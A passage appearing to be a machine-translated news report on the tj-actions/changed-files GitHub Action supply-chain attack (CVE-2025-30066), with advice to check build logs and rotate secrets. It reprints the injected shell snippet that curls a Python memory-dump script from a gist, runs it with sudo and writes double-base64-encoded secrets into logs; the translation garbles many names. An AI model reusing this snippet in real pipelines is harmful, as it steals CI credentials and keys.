The company has discovered an attack on Stepecurity, which specializes in safety for CI/CD pipelines (continuous integration/continuous distribution), for GITHUB works on Open Source Tool TJ-section/Chanter Files. The unknown has smuggled into the tool that creates sensitive information like AWS Keys, Github Access (Personal Access Tows, PAT) and Private RSA key from the project in a log file.
CVE entry (general weaknesses and exposure) Cve-2025-30066 The score of 8.6 is classified as high. Stepecurity discovered the attack on 14 March. The maintenancers of TJ-activities/changed files have now removed the Malice code from the project. However, there is still a risk that the construction log can be seen with sensitive information in public github repository.
Paid through Python Script
TJ activities/changed files Can be in workflow with Github actions Integrated. The tool tracks below in the CI/CD process which files have changed.
The attackers have clearly gained access to repository via individual access tokens, which are up to the @TJ-action-boot. According to the issue in repository Can’t understand how Pat has been compromised. Github has now withdrawn tokens. The project minors have changed passwords and active passing authentication as protection against future attacks.
For the attack, a base 64-coded code section initially landed in the repository, which decodes a python script From a github gist Call:
if (( "$OSTYPE" == "linux-gnu" )); then
B64_BLOB=`curl -sSf https://gist.githubusercontent.com/nikitastupin/30e525b776c409e03c2d6f328f254965/raw/memdump.py | sudo python3 | tr -d '\0' | grep -aoE '"(^")+":\{"value":"(^")*","isSecret":true\}' | sort -u | base64 -w 0 | base64 -w 0`
echo $B64_BLOB
else
exit 0
fiPython script memdump.py finally discovers mysteries and closes them in the log. So that the safety equipment automatically identify the information as sensitive information and do not filter, encode This script twice with Base64,
Public representative in danger
Even though the Minters have now removed the Malis code from the project and GIST is no longer present with the Malis Code, there is a risk for public repositors that the attackers can see build logs and decode sensitive information.
Anyone who uses the tool in his Github action pipeline should definitely check the build log for suspicious materials. If the log has double base 64-encoded sections, it is necessary not only to remove the files, but also to change the affected secrets.
(RME)
